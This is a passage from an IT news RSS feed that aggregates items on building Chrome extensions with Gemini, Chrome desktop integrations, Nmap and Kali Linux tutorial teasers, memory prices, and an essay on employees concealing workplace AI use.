<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full is-resized"> width="620" height="161" sizes="auto, (max-width: 620px) 100vw, 620px"&gt;<figcaption class="wp-element-caption"><p>Google Docs with my custom Docs Zen extension — a true delight for daily writing.</p>
</figcaption></figure><p class="imageCredit">JR Raphael / Foundry</p></div>



<p>My setup deliberately doesn’t include comments or other collaborative elements, as I’m mostly writing by myself these days — but when I do need those elements, the eye icon in the upper-right corner of the screen disables my custom adjustments and takes me back to the standard Docs interface. I can then click the eye icon again in <em>that</em> environment to switch back.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/gemini-custom-chrome-extensions-google-docs-toggle-620.gif" alt="animated screenshot of toggling between simplified and full google docs interface" class="wp-image-4185725" width="620" height="117" sizes="auto, (max-width: 620px) 100vw, 620px"><figcaption class="wp-element-caption"><p>My custom extension includes a simple on-off toggle for times when I need the full Docs setup.</p>
</figcaption></figure><p class="imageCredit">JR Raphael / Foundry</p></div>



<p>I used Gemini to create something similar for <a href="https://www.computerworld.com/article/1712947/what-is-trello-a-guide-to-atlassians-collaboration-and-work-management-tool.html">Trello</a>, with which I also have a love-hate relationship — loving the foundational functions and easy access everywhere but hating the interface that’s <a href="https://www.computerworld.com/article/3832819/atlassian-refocuses-trello-on-individual-task-management.html">lost focus</a>, gained bloat, and gotten noticeably clunky and slow over time.</p>



<p>With the same sort of step-by-step, plain-English guidance, I was able to transform Trello from this…</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/gemini-custom-chrome-extensions-05-trello-before.jpg?quality=50&amp;strip=all" alt="screenshot of busy default trello interface" class="wp-image-4185239" width="999" height="639" sizes="auto, (max-width: 999px) 100vw, 999px"><figcaption class="wp-element-caption"><p>Trello, in its typical current-day state.</p>
</figcaption></figure><p class="imageCredit">JR Raphael / Foundry</p></div>



<p>…into <em>this</em>:</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/gemini-custom-chrome-extensions-06-trello-after.jpg?quality=50&amp;strip=all" alt="screenshot of trello interface simplified by custom chrome extension written by gemini" class="wp-image-4185234" width="997" height="641" sizes="auto, (max-width: 997px) 100vw, 997px"><figcaption class="wp-element-caption"><p>Trello, with my custom modifications in place.</p>
</figcaption></figure><p class="imageCredit">JR Raphael / Foundry</p></div>



<p>I couldn’t even begin to recount the number of superfluous features and elements I’ve removed, along with revamping the overall interface to make it both more efficient and more visually pleasing to my eye.</p>



<p>Whether it’s a web app you rely on regularly or even just a website you open often, the possibilities are practically endless for the ways you can reshape it and mold it to make it work better <em>for you</em>.</p>



<p>Speaking of which…</p>



<h2 class="wp-block-heading"><a></a>Custom extension category #2: The feature creator</h2>



<p>In addition to the surface-level adjustments and feature removals in my aforementioned Trello-enhancing extension, I also <em>added in </em>several components — such as one-click buttons for archiving or moving cards — and I managed to speed up the site by making some under-the-hood adjustments Gemini suggested when I asked about its choppy performance. The same sort of concept can apply to any web-based interface you’re using, if there are any options that are annoyingly buried within menus, shortcuts that’d make your life easier, or other improvements you’ve longed to see.</p>



<p>You can also consider some simple standalone extensions for giving yourself on-demand features that aren’t necessarily associated with any one specific website but could be useful in plenty of productivity scenarios. For instance:</p>



<ul class="wp-block-list">
<li>I do a fair amount of basic image editing and frequently find myself needing to reference a hex color code that corresponds with a particular brand color, and I always end up having to open up a new tab and look in a note somewhere to find the code I need. Well, no more: I used Gemini to create a super-simple custom color code pop-up where I can store all the colors I need and then copy any of ’em onto my clipboard with a single click. <em>Major </em>time-saver.</li>
</ul>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/gemini-custom-chrome-extensions-07-color-palette.jpg?quality=50&amp;strip=all" alt="screenshot of color palette selector - a custom chrome extension created by gemini " class="wp-image-4185237" width="478" height="555" sizes="auto, (max-width: 478px) 100vw, 478px"><figcaption class="wp-element-caption"><p>All the color codes I need are now never more than a couple clicks away.</p>
</figcaption></figure><p class="imageCredit">JR Raphael / Foundry</p></div>



<ul class="wp-block-list">
<li>I’m also constantly converting time zones, either for meetings with clients or colleagues or for trying to wrap my head around publishing systems that insist on using random time zones with no meaning to me. It’s infinitely easier for me to manage now, thanks to the custom Chrome extension I made that shows the current time in all the zones I need most often — as well as allowing me to put any <em>other </em>time into any field and have all the other zones instantly adjust to match. It also offers a brilliant plain-text conversion box where I can just type things like “1pm-3pm PT in MT” and have it cough back up an instant answer for any conversion I need.</li>
</ul>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/gemini-custom-chrome-extensions-08-time-zone-converter.jpg?quality=50&amp;strip=all" alt="screenshot of time zone converter  - a custom chrome extension created by gemini " class="wp-image-4185235" width="432" height="542" sizes="auto, (max-width: 432px) 100vw, 432px"><figcaption class="wp-element-caption"><p>My custom time zone conversion extension comes in handy countless times a day.</p>
</figcaption></figure><p class="imageCredit">JR Raphael / Foundry</p></div>



<p>Maybe what you want is the ability to interact with data on different websites more easily — to be able to save any table on a page in front of you as a CSV file, mayhap, or even to save any text you highlight on a page into a new Google Docs document. Whatever the case may be, Gemini can handle it — and that superpower that you’ve always wished for but never found the right tool to make possible can actually now be yours.</p>



<h2 class="wp-block-heading"><a></a>Custom extension category #3: The browser expander</h2>



<p>Our final category of custom Chrome extensions to consider moves beyond the web itself and into your actual browser. The browser is essentially the modern-day desktop, after all — and for the first time now, you can expand and enhance it in all sorts of interesting ways.</p>



<p>Some specific examples, to get your brain-motor whirring:</p>



<ul class="wp-block-list">
<li>You could walk Gemini through creating a smart auto-snooze system for your open browser tabs, both to clear clutter and help with <a href="https://www.computerworld.com/article/1666806/easy-steps-to-make-chrome-faster-and-more-secure.html">Chrome’s performance</a>. It could save any tab that hasn’t been touched in a certain amount of time to your local storage and then give you a simple searchable “Archive Dashboard” where you can find all those auto-closed tabs and re-open ’em as needed.</li>



<li>With the right guidance, Gemini could give you a custom browser research panel — where any info you highlight on a page gets beamed over into a sidebar-style panel that serves as a running scratchpad of notes from the day.</li>



<li>Or, if you find yourself often needing to see two tabs together side by side, you could have Gemini cook up a custom extension that instantly detaches any tab in front of you and puts it into a new tab window in a perfectly sized and spaced pattern. One keyboard shortcut could make that move happen, while another keyboard shortcut could recombine the two tabs into a single centered window.</li>
</ul>



<p>As with all the other ideas we’ve gone over, all you’ve gotta do is ask — and now, with the right inspiration in mind, you’re ready to get your custom extension adventures going and start bending the web to <em>your</em> will.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google auf dem Desktop: Wird der Chrome-Browser zum trojanischen Pferd? Neue Integrationen zeigen sich]]></title>
<description><![CDATA[Erst vor wenigen Monaten ist die Google-App für Windows gestartet, die einen überraschend großen Funktionsumfang und praktische Zugänge in eine schlanke App bringt. Schon bald könnte es dieser wieder an den Kragen gehen, denn jetzt zeigt sich eine völlig neue Funktion in Google Chrome, die das Po...]]></description>
<link>https://tsecurity.de/de/3630984/it-nachrichten/google-auf-dem-desktop-wird-der-chrome-browser-zum-trojanischen-pferd-neue-integrationen-zeigen-sich/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3630984/it-nachrichten/google-auf-dem-desktop-wird-der-chrome-browser-zum-trojanischen-pferd-neue-integrationen-zeigen-sich/</guid>
<pubDate>Sun, 28 Jun 2026 13:46:35 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="640" height="360" src="https://www.googlewatchblog.de/wp-content/uploads/chrome-everywhere-1024x576.jpg" class="attachment-large size-large wp-post-image" alt="chrome everywhere" decoding="async" fetchpriority="high" srcset="https://www.googlewatchblog.de/wp-content/uploads/chrome-everywhere-1024x576.jpg 1024w, https://www.googlewatchblog.de/wp-content/uploads/chrome-everywhere-300x169.jpg 300w, https://www.googlewatchblog.de/wp-content/uploads/chrome-everywhere-768x432.jpg 768w, https://www.googlewatchblog.de/wp-content/uploads/chrome-everywhere-640x360.jpg 640w, https://www.googlewatchblog.de/wp-content/uploads/chrome-everywhere-800x450.jpg 800w, https://www.googlewatchblog.de/wp-content/uploads/chrome-everywhere.jpg 1500w" sizes="(max-width: 640px) 100vw, 640px"><br>Erst vor wenigen Monaten ist die <a href="https://www.googlewatchblog.de/2026/04/google-app-fuer-windows-das-kann-die-neue-power-app-bringt-ki-suche-google-lens-launcher-co-video-u/"><strong>Google-App für Windows</strong></a> gestartet, die einen überraschend großen Funktionsumfang und praktische Zugänge in eine schlanke App bringt. Schon bald könnte es dieser wieder an den Kragen gehen, denn jetzt zeigt sich eine völlig neue Funktion in <a href="https://www.googlewatchblog.de/2026/06/google-chrome-voellig-neue-omnibox-kommt-loom-koennte-google-app-fuer-windows-ersetzen-canary-flag/"><strong>Google Chrome</strong></a>, die das Potenzial hat, diese App zu ersetzen. Gleichzeitig könnte das einen erneuten Desktop-Boost geben.</p>
<p>Mehr lesen: <a href="https://www.googlewatchblog.de/2026/06/google-auf-dem-desktop-wird-der-chrome-browser-zum-trojanischen-pferd-neue-integrationen-zeigen-sich/">Google auf dem Desktop: Wird der Chrome-Browser zum trojanischen Pferd? Neue Integrationen zeigen sich</a></p>
<hr>
<p></p><center><a href="https://www.google.com/preferences/source?q=googlewatchblog.de"><img src="https://www.googlewatchblog.de/wp-content/uploads/googlebevorzugt.webp" alt="GoogleWatchBlog als bevorzugte Quelle bei Google hinzufügen" width="284" height="90"></a></center><br><center><strong>Keine Google-News mehr verpassen:</strong> <a href="https://news.google.com/publications/CAAqLggKIihDQklTR0FnTWFoUUtFbWR2YjJkc1pYZGhkR05vWW14dlp5NWtaU2dBUAE?hl=de"><strong>GoogleWatchBlog bei Google News abonnieren</strong></a></center>
<hr>
<p></p><center><a href="https://ssl-vg03.met.vgwort.de/na/3d098a22f1b24a2dbc772e45047acceb"><img alt="vgwort" src="https://ssl-vg03.met.vgwort.de/na/3d098a22f1b24a2dbc772e45047acceb" width="16" height="16"></a></center>
<p>Der Beitrag <a href="https://www.googlewatchblog.de/2026/06/google-auf-dem-desktop-wird-der-chrome-browser-zum-trojanischen-pferd-neue-integrationen-zeigen-sich/">Google auf dem Desktop: Wird der Chrome-Browser zum trojanischen Pferd? Neue Integrationen zeigen sich</a> erschien zuerst auf <a href="https://www.googlewatchblog.de/">GoogleWatchBlog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[KI im Krieg: Autonome Waffen übernehmen das Schlachtfeld - Golem.de]]></title>
<description><![CDATA[E-Learning: IT Sicherheitstests und Ethical Hacking mit Kali Linux (E-Learning) ... – Zertifikatskurs TeleTrusT Information Security Professional ...]]></description>
<link>https://tsecurity.de/de/3630871/it-security-nachrichten/ki-im-krieg-autonome-waffen-uebernehmen-das-schlachtfeld-golemde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3630871/it-security-nachrichten/ki-im-krieg-autonome-waffen-uebernehmen-das-schlachtfeld-golemde/</guid>
<pubDate>Sun, 28 Jun 2026 12:09:03 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[E-Learning: <b>IT</b> Sicherheitstests und Ethical Hacking mit Kali Linux (E-Learning) ... – Zertifikatskurs TeleTrusT Information <b>Security</b> Professional ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Nmap Tutorial: Network Scanning From Beginner to Advanced (2026)]]></title>
<description><![CDATA[By HOC Team  |  Last updated: June 27, 2026  |  Category: Kali Linux · Network Scanning · Ethical…
The post Nmap Tutorial: Network Scanning From Beginner to Advanced (2026) appeared first on Hackers Online Club.]]></description>
<link>https://tsecurity.de/de/3630617/it-security-nachrichten/nmap-tutorial-network-scanning-from-beginner-to-advanced-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3630617/it-security-nachrichten/nmap-tutorial-network-scanning-from-beginner-to-advanced-2026/</guid>
<pubDate>Sun, 28 Jun 2026 08:37:21 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>By HOC Team  |  Last updated: June 27, 2026  |  Category: Kali Linux · Network Scanning · Ethical…</p>
<p>The post <a href="https://hackersonlineclub.com/nmap-tutorial-network-scanning/">Nmap Tutorial: Network Scanning From Beginner to Advanced (2026)</a> appeared first on <a href="https://hackersonlineclub.com/">Hackers Online Club</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Nmap Tutorial: Network Scanning From Beginner to Advanced (2026)]]></title>
<description><![CDATA[By HOC Team  |  Last updated: June 27, 2026  |  Category: Kali Linux · Network Scanning · Ethical… The post Nmap Tutorial: Network Scanning From Beginner to Advanced (2026) appeared first on Hackers Online Club. This article has been indexed…
Read more →
The post Nmap Tutorial: Network Scanning F...]]></description>
<link>https://tsecurity.de/de/3629614/it-security-nachrichten/nmap-tutorial-network-scanning-from-beginner-to-advanced-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3629614/it-security-nachrichten/nmap-tutorial-network-scanning-from-beginner-to-advanced-2026/</guid>
<pubDate>Sat, 27 Jun 2026 15:08:01 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>By HOC Team  |  Last updated: June 27, 2026  |  Category: Kali Linux · Network Scanning · Ethical… The post Nmap Tutorial: Network Scanning From Beginner to Advanced (2026) appeared first on Hackers Online Club. This article has been indexed…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/nmap-tutorial-network-scanning-from-beginner-to-advanced-2026/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/nmap-tutorial-network-scanning-from-beginner-to-advanced-2026/">Nmap Tutorial: Network Scanning From Beginner to Advanced (2026)</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Nmap Tutorial: Network Scanning From Beginner to Advanced (2026)]]></title>
<description><![CDATA[By HOC Team  |  Last updated: June 27, 2026  |  Category: Kali Linux · Network Scanning · Ethical…
The post Nmap Tutorial: Network Scanning From Beginner to Advanced (2026) appeared first on Hackers Online Club.]]></description>
<link>https://tsecurity.de/de/3629593/it-security-nachrichten/nmap-tutorial-network-scanning-from-beginner-to-advanced-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3629593/it-security-nachrichten/nmap-tutorial-network-scanning-from-beginner-to-advanced-2026/</guid>
<pubDate>Sat, 27 Jun 2026 14:50:19 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>By HOC Team  |  Last updated: June 27, 2026  |  Category: Kali Linux · Network Scanning · Ethical…</p>
<p>The post <a href="https://hackersonlineclub.com/nmap-tutorial-network-scanning-from-beginner-to-advanced-2026/">Nmap Tutorial: Network Scanning From Beginner to Advanced (2026)</a> appeared first on <a href="https://hackersonlineclub.com/">Hackers Online Club</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Duer’s Wear-Everywhere Pants Are on Sale This Weekend]]></title>
<description><![CDATA[It’s not often you can score discounts from the outdoor-coded Canadian company that makes understated and stylish performance clothing.]]></description>
<link>https://tsecurity.de/de/3629482/it-nachrichten/duers-wear-everywhere-pants-are-on-sale-this-weekend/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3629482/it-nachrichten/duers-wear-everywhere-pants-are-on-sale-this-weekend/</guid>
<pubDate>Sat, 27 Jun 2026 13:16:31 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It’s not often you can score discounts from the outdoor-coded Canadian company that makes understated and stylish performance clothing.]]></content:encoded>
</item>
<item>
<title><![CDATA[Über 80 Prozent Marge: Micron sichert hohe Speicherpreise auf fünf Jahre ab - Golem.de]]></title>
<description><![CDATA[... IT-Security-Awareness für Systemadministratoren: virtueller Ein-Tages-Workshop ... E-Learning: IT Sicherheitstests und Ethical Hacking mit Kali Linux (E ...]]></description>
<link>https://tsecurity.de/de/3628471/it-security-nachrichten/ueber-80-prozent-marge-micron-sichert-hohe-speicherpreise-auf-fuenf-jahre-ab-golemde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3628471/it-security-nachrichten/ueber-80-prozent-marge-micron-sichert-hohe-speicherpreise-auf-fuenf-jahre-ab-golemde/</guid>
<pubDate>Fri, 26 Jun 2026 21:53:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[... <b>IT</b>-<b>Security</b>-Awareness für Systemadministratoren: virtueller Ein-Tages-Workshop ... E-Learning: IT Sicherheitstests und Ethical Hacking mit Kali Linux (E ...]]></content:encoded>
</item>
<item>
<title><![CDATA[The dark side of AI success: What your employees know that the board doesn’t]]></title>
<description><![CDATA[A recent article on CIO.com made a sharp observation that deserves to be taken further. The author’s core argument: Organizations are reporting AI activity to their boards — tools purchased, pilots launched, licenses deployed — while quietly avoiding the harder question of whether any of it has a...]]></description>
<link>https://tsecurity.de/de/3626852/it-security-nachrichten/the-dark-side-of-ai-success-what-your-employees-know-that-the-board-doesnt/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3626852/it-security-nachrichten/the-dark-side-of-ai-success-what-your-employees-know-that-the-board-doesnt/</guid>
<pubDate>Fri, 26 Jun 2026 11:06:16 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>A <a href="https://www.cio.com/article/4161509/ai-hype-to-ai-value-escaping-the-activity-trap.html">recent article on CIO.com</a> made a sharp observation that deserves to be taken further. The author’s core argument: Organizations are reporting AI <em>activity</em> to their boards — tools purchased, pilots launched, licenses deployed — while quietly avoiding the harder question of whether any of it has actually moved the business. Outcomes were never defined before the projects began, so success cannot honestly be measured after the fact. The board hears momentum. The CFO sees cost. And nobody can clearly answer what actually changed because of AI.</p>



<p>It is a well-observed problem. But it only tells half the story.</p>



<p>The other half is happening desk by desk, in organizations everywhere. While executives debate ROI frameworks, a parallel economy of AI productivity is running quietly in the background — driven by employees who have figured out how to use these tools and have calculated, quite rationally, that the safest thing to do is say nothing about it.</p>



<p>Understanding what is driving that silence is not a secondary concern. It is arguably the most important AI management challenge most organizations have not yet named.</p>



<h2 class="wp-block-heading">The job security calculation no one talks about</h2>



<p>The most important driver of AI silence is also the most understandable.</p>



<p>Consider an employee who has quietly been using an AI tool to draft client reports. A task that once took four hours now takes 45 minutes. The output is better: Tighter, better structured, more thoroughly referenced. Her manager is pleased. Her clients are happier. And she has said absolutely nothing to anyone about how she is doing it.</p>



<p>When employees find themselves in this situation, the reasoning for staying silent is almost always the same: If I tell them I can do it in 45 minutes, they’ll wonder what I’m doing with the rest of my time. Or they’ll give me more work. Or they’ll decide they don’t need as many of us.</p>



<p>This is not paranoia. The <a href="https://fortune.com/2026/03/25/workers-anxious-scared-insecure-ai-adp-global-survey/" rel="nofollow">ADP Research Today at Work 2026 report</a> — which surveyed more than 39,000 workers across 36 markets — found that only 22% of global workers strongly agreed their job was safe from elimination, even against a backdrop of historically low unemployment. The culprit identified by the report is AI anxiety, gripping workforces regardless of seniority or sector.</p>



<p>The scale of that anxiety has a structural basis. The World Economic Forum’s Future of Jobs Report 2025 (weforum.org) found that while 77% of employers plan to upskill staff to work alongside AI, 41% simultaneously plan to reduce their workforce as AI automates certain tasks. Employees are reading those numbers carefully, even when their employers are not.</p>



<p><a href="https://fortune.com/2025/05/29/employees-secretly-using-ai-hiding-bosses-secret-advantage-peers/" rel="nofollow">Research from Ivanti</a> puts the scale of the resulting silence in sharp relief: Nearly one-third of workers keep their AI use secret from their employer, with 30% specifically citing fear that their job will be cut if they disclose it, and a further 36% staying silent because they enjoy the competitive edge AI gives them over peers. The employee who is most proficient with AI — and therefore delivering the greatest productivity uplift — has the most to lose by saying so. So, they say nothing, the gain disappears invisibly into expanded workload, and it never surfaces in any report to the board.</p>



<p>For organizations trying to understand the true impact of AI on their operations, this is a foundational measurement problem. The biggest wins may be the ones most deliberately hidden.</p>



<h2 class="wp-block-heading">What’s actually happening beneath the surface</h2>



<p>The job security calculation is the most significant driver of AI silence, but it is not the only one. At least four other dynamics are keeping the real story from reaching leadership:</p>



<ol class="wp-block-list">
<li><strong>Competitive concealment</strong>, which the Ivanti data captures well. Not every employee who hides AI use is afraid of their employer — some are protecting an edge over colleagues. In performance-ranked environments — sales floors, bid teams, content departments — knowing how to use AI effectively is increasingly the difference between hitting targets and missing them. People who have that edge are not always eager to share it.</li>



<li>What the data describes as <strong>complacent and non-transparent use</strong>. A <a href="https://www.techtimes.com/articles/310167/20250429/workers-are-hiding-their-ai-usestudy-reveals-why-thats-big-problem-employers.htm" rel="nofollow">KPMG global study of more than 48,000 workers across 47 countries</a> found that 58% of employees are intentionally using AI at work, yet the study identified widespread non-transparency in <em>how</em> it is being used — with many not checking the accuracy of AI outputs or disclosing usage to managers. Nicole Gillespie, co-author of the report and a professor at the University of Melbourne, described the findings as a troubling level of “inappropriate, complex and non-transparent” AI use. Her prescription: Organizations must create transparent, shared learning environments where employees feel safe to experiment with AI without fear.</li>



<li>The third is something harder to name: A kind of <strong>impostor anxiety</strong>. The same Ivanti research found that 27% of employees who use AI at work experience impostor syndrome as a result — they feel that the quality of their AI-assisted work is better than what they could produce alone, and that this gap is somehow dishonest. These tend to be the most thoughtful and quality-conscious adopters in the organization, and they are actively obscuring the AI contribution to their work rather than risk being seen as relying on a crutch.</li>



<li><strong>The shadow infrastructure problem.</strong> A Laserfiche-commissioned survey published in Security Magazine (securitymagazine.com, August 2025) found that 49% of American employees hide their AI tool use from their employer, with only 36% reporting clear AI guidelines and an approved tools list in their workplace — and one in ten describing their organization’s AI environment as “the Wild West.”</li>
</ol>



<p>The data security implications run deeper still. The KPMG global study found that 46% of US employees have uploaded sensitive company data into public AI tools, often without knowing whether the content was confidential. That is not malicious intent — it is the predictable result of a governance vacuum — but it represents a risk exposure that leadership is largely unaware of.</p>



<h2 class="wp-block-heading">What leaders should actually do about this</h2>



<p>These four dynamics — fear of redundancy, competitive concealment, impostor anxiety and shadow infrastructure — combine to produce a fifth and arguably most damaging outcome: The “do more with less” spiral.</p>



<p>When employees quietly use AI to work faster, organizations rarely recognize the efficiency gain and redistribute the capacity thoughtfully. They simply load those employees with more work. The report that used to take four hours now takes 45 minutes, so more reports get assigned. The workload expands to absorb the freed capacity. The employee cannot now reveal the AI assistance without exposing how much time they have been quietly banking. And so, the spiral continues: More output, more concealment and no organizational learning captured.</p>



<p>The CIO.com article’s central argument — that organizations must define outcomes before embarking on AI projects — is correct. But the hidden dynamics described above suggest the measurement problem runs deeper than an absence of pre-defined success criteria. You cannot define meaningful outcomes if the people generating the most significant AI-driven results are structurally incentivized not to tell you about them.</p>



<p>Closing that gap requires organizations to make three interconnected shifts — each designed to tie AI’s business outcomes directly to the employees doing the work and to create the conditions in which those employees are willing to share what they know.</p>



<h3 class="wp-block-heading">Step 1: Make the commitment explicit — and tie it to outcomes from the start</h3>



<p>The first step is to make an unambiguous public commitment that AI productivity gains will not be used as the basis for headcount decisions. But a commitment alone is not enough — it only holds weight when it is paired with something concrete employees can see: Business outcomes defined before the project begins, not after.</p>



<p>Not “AI will make us more efficient” — which means nothing and measures nothing — but observable, agreed results: Client proposal turnaround reduced from five days to two; compliance review time cut by 40%; customer query resolution improved by a defined margin within a defined period. A CIO.com analysis of AI metrics found that the most effective organizations evaluate success across three dimensions: Return on employees (output per hour, backlog reduction), return on investment (labor cost per worker, conversion rates) and return on future (market share signals, new capability unlocked). None of those measures require employees to justify their existence. All of them create a shared definition of what winning looks like.</p>



<p>When business outcomes are defined upfront, the dynamic shifts. Employees can see that the measure of AI’s success is the outcome — not their hours logged or headcount consumed. Leadership has something meaningful to report to the board beyond adoption figures. And the question changes from “how many people are using AI?” to “what did AI change about this result?” — a question employees can answer honestly, because the answer no longer puts their role at risk.</p>



<h3 class="wp-block-heading">Step 2: Build incentives strong enough to override the fear</h3>



<p>This is the step most organizations skip entirely — and it is the most important one. A commitment not to cut jobs and a clear outcome framework create the conditions for honesty. But it does not actively reward it. For employees who have spent months quietly banking efficiency gains, the rational calculation remains: Why surface what I have if there is nothing in it for me?</p>



<p>The answer from the organizations doing this well is: Make sharing genuinely worth it. Not as a vague cultural aspiration, but as a structured, visible program with real rewards attached.</p>



<p>Wharton senior fellow Scott Snyder has proposed treating employee time as capital: If an individual identifies an AI method that saves four hours a week, they receive a portion of that saved time — perhaps 50 hours a year — to invest in further AI experimentation or professional development. This creates a direct incentive to disclose efficiency gains rather than conceal them, and it transforms the calculation from “what do I lose by sharing?” to “what do I gain?”</p>



<p>Real-world examples are already emerging. Law firm Shoosmiths created a £1 million bonus fund tied to Microsoft Copilot usage, with 1,300 employees eligible to receive approximately £770 each if the firm reached one million Copilot uses in its fiscal year. IBM awards “BluePoints” to winners of its annual AI innovation contest, redeemable for electronics, appliances or event tickets. Pharma firm Sanofi uses a points system to reward employees who experiment with AI and share what they learn. As Sanofi’s head of culture put it: “Recognition is the fuel of trust, and trust is what makes AI adoption possible and scalable.”</p>



<p>McKinsey’s 2025 workplace AI research confirms that 40% of employees say incentives and financial rewards would increase their daily use of AI — ranking it fourth among the factors that would most improve adoption, behind training, workflow integration and tool access. EY’s Work Reimagined survey goes further, finding that organizations that formally align rewards with AI behaviors and outcomes are significantly more likely to achieve transformational results, while those that deploy AI onto “fragile talent foundations — weak culture, insufficient learning, misaligned rewards” see productivity benefits lag by over 40%.</p>



<p>The principle behind all of these approaches is the same: Employees will share the benefits of AI when sharing the benefits of AI is rewarded — concretely, consistently and visibly. Until that condition is met, the most productive employees in the organization will remain the quietest.</p>



<h3 class="wp-block-heading">Step 3: Rebuild the board update around outcomes and employee voice</h3>



<p>Third, demand more from the board update. <a href="https://www.grantthornton.com/services/advisory-services/artificial-intelligence/2026-ai-impact-survey" rel="nofollow">Grant Thornton’s 2026 AI Impact Survey</a> found that organizations with fully integrated AI are nearly four times more likely to report revenue growth than those still piloting. The difference is not primarily technological — it is governance and accountability. The leading organizations can demonstrate how their AI makes decisions, who owns the outcomes and what happens when something goes wrong. That level of transparency can only exist when both leadership and employees are operating in the open.</p>



<p>A board update built around outcomes looks fundamentally different from one built around activity. It does not lead with “We have deployed AI across fourteen workflows.” It leads with “Here is what changed in the business because of AI, here is how we measured it and here is what our employees told us about working with it.”</p>



<p>That last element — what employees said — is not a soft add-on. A CIO.com piece on AI adoption published in 2025 put it plainly: “Trust is the invisible infrastructure of AI adoption. It’s built through transparency about intent, honest conversations about job impact, visible upskilling opportunities and letting employees see their peers genuinely benefit.” Employee willingness to use AI, and to share its benefits openly is the most reliable leading indicator of whether an AI program is building genuine organizational capability or simply burning through budget on tools that will be quietly worked around.</p>



<p>Organizations that track this systematically ask three questions on a regular basis: Is AI use growing organically, or only where it is mandated? Are employees who use AI more likely to flag further opportunities, or do they stay quiet? And when AI delivers a measurable outcome, does the team responsible feel able to claim it?</p>



<p>If the answers are “mostly mandated,” “they stay quiet” and “not really” — the organization has a trust and incentive problem that no amount of AI investment will solve. The technology is not the constraint. The environment is.</p>



<p>The board update on AI should not just report how many licenses are deployed and how many pilots are underway. It should grapple with harder questions: What are employees actually using AI for today, including tools we did not procure? What outcomes has that usage produced and how do we know? What would it take to make it safe — and genuinely worthwhile — for them to tell us?</p>



<p>Until those questions are asked — and until the answers can be given without fear and with something to gain — the most important AI story in the building will continue to be told in silence. The board will keep hearing about activity. The CFO will keep questioning ROI. And the employee who cracked the code months ago will keep her head down, produce excellent work and say nothing.</p>



<p>That is the measurement problem the CIO.com article did not quite reach. And it is the one that matters most.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Top 20 Kali Linux Commands Every Hacker Must Know (2026)]]></title>
<description><![CDATA[Top 20 Kali Linux Commands Every Hacker Must Know (2026) Whether you just installed Kali Linux for the… The post Top 20 Kali Linux Commands Every Hacker Must Know (2026) appeared first on Hackers Online Club. This article has been…
Read more →
The post Top 20 Kali Linux Commands Every Hacker Must...]]></description>
<link>https://tsecurity.de/de/3626365/it-security-nachrichten/top-20-kali-linux-commands-every-hacker-must-know-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3626365/it-security-nachrichten/top-20-kali-linux-commands-every-hacker-must-know-2026/</guid>
<pubDate>Fri, 26 Jun 2026 07:38:10 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Top 20 Kali Linux Commands Every Hacker Must Know (2026) Whether you just installed Kali Linux for the… The post Top 20 Kali Linux Commands Every Hacker Must Know (2026) appeared first on Hackers Online Club. This article has been…</p>
